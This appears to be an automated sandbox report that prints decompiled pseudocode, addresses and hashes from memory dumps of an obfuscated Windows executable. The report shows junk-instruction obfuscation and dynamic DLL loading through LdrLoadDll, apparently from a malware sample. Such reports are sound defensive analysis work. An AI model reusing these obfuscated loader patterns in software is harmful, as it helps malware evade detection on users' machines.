              				UNICODE_STRING* _t26;
              				void* _t28;
              				intOrPtr* _t30;
              
              				_t10 = __eax + 1;
              				_t33 = __eax + 1;
              				if (__eax + 1 >= 0) goto 0x40268f;
              				asm("cmc");
              				L0040113B(_t10, __ebx, 0x54, __edi, __esi, _t33);
              				_t18 =  *((intOrPtr*)(_t28 + 8));
              				_t26 = _t28 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
              				_t23 = _t28 - 4;
              				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
              				_t34 = _t13;
              				if(_t13 != 0) {
              					 *(_t28 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t14 =  *_t30;
              				L0040113B(_t14, _t18, 0x54, _t23, _t26, _t34);
              				_t16 =  *(_t28 - 4);
              				asm("cld");
              				return _t16;
              			}









              0x004026a1
              0x004026a1
              0x004026a2
              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 80697416e32412e61e90a2d0059fcaa52d4ad9df000577b6c23a564778a77204
              • Instruction ID: 039b92b3bc377875b2539483f21a67e2c46150ce5e09c5a02f6ccc11c3569293
              • Opcode Fuzzy Hash: 80697416e32412e61e90a2d0059fcaa52d4ad9df000577b6c23a564778a77204
              • Instruction Fuzzy Hash: 00F0A431604105E7CF409A80CA49BAE7760BF5431CF208837E607BA1C0C6BE960BAB5F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00402684(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				long _t12;
              				intOrPtr _t13;
              				struct _OBJDIR_INFORMATION _t15;
              				UNICODE_STRING* _t25;
              				void* _t27;
              				intOrPtr* _t29;
              
              				asm("enter 0x26d5, 0x2f");
              				asm("cmc");
              				L0040113B(0x26ab, __ebx, 0x54, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				_t25 = _t27 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t27 + 8)) + 0xc))(_t25,  *((intOrPtr*)(_t27 + 0xc)));
              				_t22 = _t27 - 4;
              				_t12 = LdrLoadDll(0, 0, _t25, _t27 - 4);
              				_t33 = _t12;
              				if(_t12 != 0) {
              					 *(_t27 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t13 =  *_t29;
              				L0040113B(_t13, _t17, 0x54, _t22, _t25, _t33);
              				_t15 =  *(_t27 - 4);
              				asm("cld");
              				return _t15;
              			}









              0x00402684
              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 9fa225b73b0fbc440d7809f0c4de80ba1de754a46804c248283ef205c12e470c
              • Instruction ID: 1592832bb26429d0d5bc6eeac685ea7d810a8ce97a22e23b845bb34f93bf1d25
              • Opcode Fuzzy Hash: 9fa225b73b0fbc440d7809f0c4de80ba1de754a46804c248283ef205c12e470c
              • Instruction Fuzzy Hash: E7F04F31608504E7DF409A84CB4CBAD7764AB44318F208877E6077E1C0C6BF9A5BBB6B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E00402690(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				long _t13;
              				intOrPtr _t14;
              				struct _OBJDIR_INFORMATION _t16;
              				UNICODE_STRING* _t26;
              				void* _t28;
              				intOrPtr* _t30;
              
              				asm("cmc");
              				L0040113B(0x26ab, __ebx, 0x54, __edi, __esi, __eflags);
              				_t18 =  *((intOrPtr*)(_t28 + 8));
              				_t26 = _t28 - 0xc;
              				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)));
              				_t23 = _t28 - 4;
              				_t13 = LdrLoadDll(0, 0, _t26, _t28 - 4);
              				_t34 = _t13;
              				if(_t13 != 0) {
              					 *(_t28 - 4) = 0;
              				}
              				_push(0x26ab);
              				_t14 =  *_t30;
              				L0040113B(_t14, _t18, 0x54, _t23, _t26, _t34);
              				_t16 =  *(_t28 - 4);
              				asm("cld");
              				return _t16;
              			}









              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 0b5097bee0adcdede92c20a6399b8213410aaf37ddf8ecf3ab260af07fe51a56
              • Instruction ID: c51ef2b5fccd3abaa8a4dbdb4b3eebed7944f530d1d10122075f7db3f908702c
              • Opcode Fuzzy Hash: 0b5097bee0adcdede92c20a6399b8213410aaf37ddf8ecf3ab260af07fe51a56
              • Instruction Fuzzy Hash: D3F06231608104E7DF409A95CA48B9E7720AB44319F248437E307BE1C0C6BB9A0BAB6B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 44%
              			E0040294E(void* __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __fp0) {
              				signed char _t45;
              				signed char _t46;
              				void* _t48;
              				signed char _t51;
              				signed char _t52;
              				signed char _t53;
              				void* _t56;
              				intOrPtr _t59;
              				signed char _t64;
              				void* _t75;
              				signed char _t76;
              				void* _t87;
              				void* _t89;
              				void* _t90;
              				signed int _t96;
              				void* _t99;
              				signed int _t101;
              				void* _t102;
              				void* _t105;
              				void* _t114;
              				void* _t117;
              				void* _t122;
              				intOrPtr* _t125;
              				signed char _t147;
              				void* _t151;
              
              				_t151 = __fp0;
              				_t99 = __esi;
              				_t96 = __edi;
              				_t94 = __edx;
              				_t45 = __eax - 0x14ffec00;
              				_t147 = _t45;
              				_t114 = _t105 - 0xfffffffffffffff9;
              				if(_t147 > 0) {
              					asm("cmpsd");
              					 *0xad5ea7ab = _t45;
              					goto L6;
              				} else {
              					if(_t147 <= 0) {
              						L6:
              						asm("stosd");
              						asm("cmpsd");
              						_pop(_t99);
              						asm("lodsd");
              						asm("lodsd");
              						_t46 = _t45 -  *((intOrPtr*)(_t99 + _t101 * 8));
              						__eflags = _t46;
              						_t117 = _t114 - 0xffffffffffffffff;
              						 *((intOrPtr*)(_t46 + 0x68)) = 0xa74888cf;
              						goto L7;
              					} else {
              						asm("aas");
              						_t117 = _t114 - 0xffffffffffffffff;
              						_t46 = _t45 & 0x0000004c;
              						 *((intOrPtr*)(_t46 + 0x4c)) =  *((intOrPtr*)(_t46 + 0x4c)) - __ecx;
              						_t3 = __edi + 0x4c + __edi * 2;
              						 *_t3 =  *(__edi + 0x4c + __edi * 2) & __ecx;
              						if( *_t3 <= 0) {
              							L7:
              							asm("cmpsd");
              							asm("adc edi, esp");
              							asm("cmpsd");
              							 *0xab21a462 = _t46 - 1;
              							_t48 = 0x29fb;
              							_t87 = 0xa4;
              							L0040113B(_t48, 0xb3, _t87, _t96, _t99, __eflags);
              							asm("ror edi, 0x89");
              							asm("bound ecx, [esp+ecx*2+0x1c]");
              							 *0x00000091 = es;
              							 *((intOrPtr*)(_t101 + 0x4c)) =  *((intOrPtr*)(_t101 + 0x4c)) - _t87;
              							asm("ror edi, 0xbd");
              							asm("bound ecx, [esp+ecx*2+0x1c]");
              							 *((intOrPtr*)(0x91)) = es;
              							 *((intOrPtr*)(_t101 + 0x4c)) =  *((intOrPtr*)(_t101 + 0x4c)) + _t87;
              							_t51 = 0xa4;
              							_pop(_t75);
              							_t76 = _t75 + 1;
              							__eflags = _t76;
              							_pop(_t102);
              							if(_t76 < 0) {
              								asm("ror edi, 0x45");
              								asm("arpl [esp+ecx*2+0x1c], cx");
              								 *((intOrPtr*)(0x91)) = es;
              								asm("ror edi, 0x59");
              								asm("arpl [esp+ecx*2+0x1c], cx");
              								 *((intOrPtr*)(0x91)) = es;
              								_t102 = _t102 - 1;
              								asm("cmpsd");
              								_t64 = 0x4d;
              								 *0x0000012F =  *0x0000012F & 0x000000a4;
              								asm("retf 0x24cd");
              								_t76 = 0x65;
              								asm("invalid");
              								_t51 = _t64;
              								_t94 = 0xa77ba3a7;
              								_t87 = 0xa74888cf;
              								__eflags = 0xa4 - 0xc4;
              							}
              							asm("loopne 0x42");
              							asm("insd");
              							_pop(_t122);
              							_t52 = _t51 & 0x000000e8;
              							_t125 = _t122 - 0xffffffffffffffff;
              							 *((intOrPtr*)(_t52 + 0x68)) = 0xa74888cf;
              							_t88 = _t87 - 1;
              							__eflags = _t87 - 1;
              							if(__eflags <= 0) {
              								asm("cmpsd");
              								 *0xaad0a488 = _t52;
              								_t76 = 0xb3;
              								_push(0x2ace);
              								_t59 =  *_t125;
              								_t88 = 0xa8;
              								L0040113B(_t59, 0xb3, _t88, 0x8cc9b3b3, _t99, __eflags);
              								_push( *((intOrPtr*)(_t102 - 4)));
              								L004018AF(_t94, _t99, __eflags);
              								_t32 = _t76 + 0x2f1d; // 0x2fd0
              								_t52 = _t32;
              							}
              							asm("das");
              							 *_t52 =  *_t52 + _t52;
              							_push(_t52);
              							_push( *((intOrPtr*)(_t102 - 4)));
              							_t53 = L004024AC(_t76, 0x8cc9b3b3, _t99, __eflags); // executed
              							__eflags = _t53;
              							if(__eflags != 0) {
              								__eflags = L00401E02(_t94, 0x8cc9b3b3, __eflags, _t151,  *((intOrPtr*)(_t102 - 4)));
              								if(__eflags != 0) {
              									L29:
              									__eflags = gs;
              									if(__eflags != 0) {
              										_t56 = _t76 + 0x51f2;
              										_t89 = 0x2dfd;
              									} else {
              										_t38 = _t76 + 0x2f5d; // 0x3010
              										_t56 = _t38;
              										_t89 = 0x2295;
              									}
              									_push( *((intOrPtr*)(_t76 + 0x7fef)));
              									_push(_t89);
              									_push(_t56);
              									_push( *((intOrPtr*)(_t102 - 4)));
              									L00401813(_t94, _t99, __eflags);
              									asm("cmc");
              									__eflags = 0;
              									 *0x2ace =  *0x2ace + 0x2ace;
              									_t90 = 0xa8;
              									_t53 = L0040113B(0x2ace, _t76, _t90, 0x8cc9b3b3, _t99, 0);
              								} else {
              									_t53 = L00402114(_t94, __eflags,  *((intOrPtr*)(_t102 - 4)));
              									__eflags = _t53;
              									if(__eflags != 0) {
              										_push( *((intOrPtr*)(_t102 - 4)));
              										_t53 = L004021E4(_t94, __eflags, _t151);
              										__eflags = _t53;
              										if(__eflags != 0) {
              											_push( *((intOrPtr*)(_t102 - 4)));
              											_t53 = L00401EB1(_t88, __eflags);
              											__eflags = _t53;
              											if(_t53 != 0) {
              												goto L29;
              											}
              										}
              									}
              								}
              							}
              							return _t53;
              						} else {
              							asm("adc al, cl");
              							 *(_t46 + 0x384c72cc) =  *(_t46 + 0x384c72cc) ^ _t117 - 0xfffffffffffffffd;
              							asm("sbb dh, [ebx-0x5e5b4fc7]");
              							 *((intOrPtr*)(0x91)) = es;
              							asm("scasb");
              							asm("out 0xcf, eax");
              							asm("invalid");
              							_push(0xa74888cf);
              							_push(0x1f);
              							return 0x1f;
              						}
              					}
              				}
              			}




























              0x0040294e
              0x0040294e
              0x0040294e
              0x0040294e
              0x0040295b
              0x0040295b
              0x00402960
              0x00402961
              0x004029af
              0x004029b0
              0x00000000
              0x00402963
              0x00402963
              0x004029b1
              0x004029b1
              0x004029b2
              0x004029b3
              0x004029b4
              0x004029b5
              0x004029b6
              0x004029b6
              0x004029bb
              0x004029bc
              0x00000000
              0x00402965
              0x00402967
              0x00402968
              0x00402969
              0x0040296b
              0x0040296f
              0x0040296f
              0x00402973
              0x004029c1
              0x004029c2
              0x004029c4
              0x004029c6
              0x004029c7
              0x004029db
              0x004029ee
              0x004029f6
              0x004029fb
              0x004029fe
              0x00402a0b
              0x00402a0e
              0x00402a12
              0x00402a15
              0x00402a22
              0x00402a25
              0x00402a2b
              0x00402a2d
              0x00402a33
              0x00402a33
              0x00402a34
              0x00402a35
              0x00402a39
              0x00402a3c
              0x00402a49
              0x00402a50
              0x00402a53
              0x00402a60
              0x00402a64
              0x00402a67
              0x00402a68
              0x00402a69
              0x00402a6c
              0x00402a6f
              0x00402a73
              0x00402a7b
              0x00402a7c
              0x00402a81
              0x00402a82
              0x00402a82
              0x00402a84
              0x00402a86
              0x00402a87
              0x00402a88
              0x00402a8c
              0x00402a8d
              0x00402a94
              0x00402a94
              0x00402a95
              0x00402a97
              0x00402a98
              0x00402a9d
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b65
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b19
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77
              0x00402975
              0x0040297a
              0x0040297c
              0x00402983
              0x0040298d
              0x00402990
              0x00402994
              0x004029a5
              0x004029a7
              0x004029ad
              0x004029ae
              0x004029ae
              0x00402973
              0x00402963

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b839fabab3310f66fafc047d9c24446b3a87488924e78c1b0467cffa7a0a9ec
              • Instruction ID: d476424f13aa43859d7491ddcaddda13511bdd08c1c7de62bee6dbd18e85cba0
              • Opcode Fuzzy Hash: 2b839fabab3310f66fafc047d9c24446b3a87488924e78c1b0467cffa7a0a9ec
              • Instruction Fuzzy Hash: FE516A31615900DED710AF61AF4B5A97770FF60300F6400BBD446BB2E6D6B89942DF9B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402A74(signed char __eax, void* __ecx, void* __edi, void* __esi, void* __fp0) {
              				signed char _t16;
              				signed char _t17;
              				void* _t18;
              				void* _t19;
              				void* _t21;
              				intOrPtr _t24;
              				void* _t30;
              				void* _t32;
              				void* _t33;
              				void* _t37;
              				void* _t39;
              				intOrPtr* _t42;
              				void* _t54;
              
              				_t54 = __fp0;
              				_t36 = __esi;
              				_t35 = __edi;
              				_t16 = __eax;
              				_t30 = 0xa74888cf;
              				asm("loopne 0x42");
              				asm("insd");
              				_pop(_t39);
              				_t17 = _t16 & 0x000000e8;
              				_t42 = _t39 - 0xffffffffffffffff;
              				 *((intOrPtr*)(_t17 + 0x68)) = 0xa74888cf;
              				_t31 = _t30 - 1;
              				_t46 = _t30 - 1;
              				if(_t30 - 1 <= 0) {
              					asm("cmpsd");
              					 *0xaad0a488 = _t17;
              					_push(0x2ace);
              					_t24 =  *_t42;
              					_t31 = 0xa8;
              					L0040113B(_t24, 0xb3, _t31, __edi, __esi, _t46);
              					_push( *((intOrPtr*)(_t37 - 4)));
              					L004018AF(0xa77ba3a7, __esi, _t46);
              					_t17 = 0x2fd0;
              				}
              				asm("das");
              				 *_t17 =  *_t17 + _t17;
              				_push(_t17);
              				_push( *((intOrPtr*)(_t37 - 4)));
              				_t18 = L004024AC(0xb3, _t35, _t36, _t46); // executed
              				_t47 = _t18;
              				if(_t18 != 0) {
              					_t19 = L00401E02(0xa77ba3a7, _t35, _t47, _t54,  *((intOrPtr*)(_t37 - 4)));
              					_t48 = _t19;
              					if(_t19 != 0) {
              						L14:
              						_t52 = gs;
              						if(gs != 0) {
              							_t21 = 0x52a5;
              							_t32 = 0x2dfd;
              						} else {
              							_t21 = 0x3010;
              							_t32 = 0x2295;
              						}
              						_push( *0x000080A2);
              						_push(_t32);
              						_push(_t21);
              						_push( *((intOrPtr*)(_t37 - 4)));
              						L00401813(0xa77ba3a7, _t36, _t52);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t33 = 0xa8;
              						_t18 = L0040113B(0x2ace, 0xb3, _t33, _t35, _t36, 0);
              					} else {
              						_t18 = L00402114(0xa77ba3a7, _t48,  *((intOrPtr*)(_t37 - 4)));
              						_t49 = _t18;
              						if(_t18 != 0) {
              							_push( *((intOrPtr*)(_t37 - 4)));
              							_t18 = L004021E4(0xa77ba3a7, _t49, _t54);
              							_t50 = _t18;
              							if(_t18 != 0) {
              								_push( *((intOrPtr*)(_t37 - 4)));
              								_t18 = L00401EB1(_t31, _t50);
              								if(_t18 != 0) {
              									goto L14;
              								}
              							}
              						}
              					}
              				}
              				return _t18;
              			}
















              0x00402a74
              0x00402a74
              0x00402a74
              0x00402a7b
              0x00402a81
              0x00402a84
              0x00402a86
              0x00402a87
              0x00402a88
              0x00402a8c
              0x00402a8d
              0x00402a94
              0x00402a94
              0x00402a95
              0x00402a97
              0x00402a98
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8733ba4a355e6db03d0f48299abb24745a856322706511f728a24ef6ab87c0a5
              • Instruction ID: 5727807365af5b533eb2960dd74d83acd188cd47fd534299edba30eea68514f7
              • Opcode Fuzzy Hash: 8733ba4a355e6db03d0f48299abb24745a856322706511f728a24ef6ab87c0a5
              • Instruction Fuzzy Hash: C0219930614505EAEA216E518F0ED7D3375EB50344B644077E902B91E6DEFD9E02AA1F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E00402AA1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				intOrPtr _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t26;
              				void* _t27;
              				void* _t28;
              				void* _t29;
              				void* _t32;
              				intOrPtr* _t34;
              
              				_t37 = __eflags;
              				_t31 = __esi;
              				_t30 = __edi;
              				_t23 = __ebx;
              				_push(0x2ace);
              				_t13 =  *_t34;
              				_t26 = 0xa8;
              				L0040113B(_t13, __ebx, _t26, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t32 - 4)));
              				L004018AF(_t29, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t32 - 4)));
              				_t17 = L004024AC(__ebx, _t30, __esi, _t37); // executed
              				_t38 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t29, _t30, _t38, __fp0,  *((intOrPtr*)(_t32 - 4)));
              					_t39 = _t18;
              					if(_t18 != 0) {
              						L11:
              						_t43 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t27 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t27 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t27);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t32 - 4)));
              						L00401813(_t29, _t31, _t43);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t28 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t28, _t30, _t31, 0);
              					} else {
              						_t17 = L00402114(_t29, _t39,  *((intOrPtr*)(_t32 - 4)));
              						_t40 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t32 - 4)));
              							_t17 = L004021E4(_t29, _t40, __fp0);
              							_t41 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t32 - 4)));
              								_t17 = L00401EB1(_t26, _t41);
              								if(_t17 != 0) {
              									goto L11;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}















              0x00402aa1
              0x00402aa1
              0x00402aa1
              0x00402aa1
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b81f6e9d0023ef269c51617abf66fd20542672f5f2a610cf8e9df85c1a83b53
              • Instruction ID: 47fc198d5207412bcb5b3d3e41bd7e60512a2df0e8119861439cca51f741cef0
              • Opcode Fuzzy Hash: 9b81f6e9d0023ef269c51617abf66fd20542672f5f2a610cf8e9df85c1a83b53
              • Instruction Fuzzy Hash: 25118A20608106EADF217E51CF0ED7E37795F50344F644077A902791E6DBBDAE12662F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402AB2(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				intOrPtr _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t27;
              				void* _t30;
              				intOrPtr* _t32;
              
              				_t35 = __eflags;
              				_t29 = __esi;
              				_t28 = __edi;
              				_t23 = __ebx;
              				asm("int1");
              				asm("sbb al, 0xeb");
              				_push(0x2ace);
              				_t13 =  *_t32;
              				_t24 = 0xa8;
              				L0040113B(_t13, __ebx, _t24, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				L004018AF(_t27, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				_t17 = L004024AC(__ebx, _t28, __esi, _t35); // executed
              				_t36 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t27, _t28, _t36, __fp0,  *((intOrPtr*)(_t30 - 4)));
              					_t37 = _t18;
              					if(_t18 != 0) {
              						L12:
              						_t41 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t25 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t25 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t25);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t30 - 4)));
              						L00401813(_t27, _t29, _t41);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t26 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t26, _t28, _t29, 0);
              					} else {
              						_t17 = L00402114(_t27, _t37,  *((intOrPtr*)(_t30 - 4)));
              						_t38 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t30 - 4)));
              							_t17 = L004021E4(_t27, _t38, __fp0);
              							_t39 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t30 - 4)));
              								_t17 = L00401EB1(_t24, _t39);
              								if(_t17 != 0) {
              									goto L12;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}















              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab3
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c423d7b115f8b71c2cdae9f1f93030425c4fd42b98edc1a19394fdce7832392d
              • Instruction ID: b889dc3653f2fefba51467e05df38c533c4bb4e3d2ea1bbc4c1d9987d1b66d31
              • Opcode Fuzzy Hash: c423d7b115f8b71c2cdae9f1f93030425c4fd42b98edc1a19394fdce7832392d
              • Instruction Fuzzy Hash: 08018824608106EADF217E61CF0ED7E37799F50384F604077AD01781E6DEBDAE12652E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 56%
              			E00402AB9(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t19;
              				void* _t20;
              				void* _t22;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t29;
              
              				_t32 = __eflags;
              				_t28 = __esi;
              				_t27 = __edi;
              				_t22 = __ebx;
              				asm("in eax, dx");
              				if(__eflags > 0) {
              					L10:
              					goto L12;
              				} else {
              					_t25 = 0xa8;
              					L0040113B(_t13, __ebx, _t25, __edi, __esi, __eflags);
              					_push( *((intOrPtr*)(_t29 - 4)));
              					L004018AF(_t26, __esi, __eflags);
              					_t2 = _t22 + 0x2f1d; // 0x2fd0
              					_t19 = _t2;
              					asm("das");
              					 *_t19 =  *_t19 + _t19;
              					_push(_t19);
              					_push( *((intOrPtr*)(_t29 - 4)));
              					_t16 = L004024AC(__ebx, _t27, __esi, _t32); // executed
              					_t33 = _t16;
              					if(_t16 != 0) {
              						_t20 = L00401E02(_t26, _t27, _t33, __fp0,  *((intOrPtr*)(_t29 - 4)));
              						_t34 = _t20;
              						if(_t20 != 0) {
              							L8:
              							_t38 = gs;
              							if(gs != 0) {
              								_t13 = _t22 + 0x51f2;
              								_t23 = 0x2dfd;
              							} else {
              								_t8 = _t22 + 0x2f5d; // 0x3010
              								_t13 = _t8;
              								_t23 = 0x2295;
              								goto L10;
              							}
              							L12:
              							_push( *((intOrPtr*)(_t22 + 0x7fef)));
              							_push(_t23);
              							_push(_t13);
              							_push( *((intOrPtr*)(_t29 - 4)));
              							L00401813(_t26, _t28, _t38);
              							asm("cmc");
              							 *0x2ace =  *0x2ace + 0x2ace;
              							_t24 = 0xa8;
              							_t16 = L0040113B(0x2ace, _t22, _t24, _t27, _t28, 0);
              						} else {
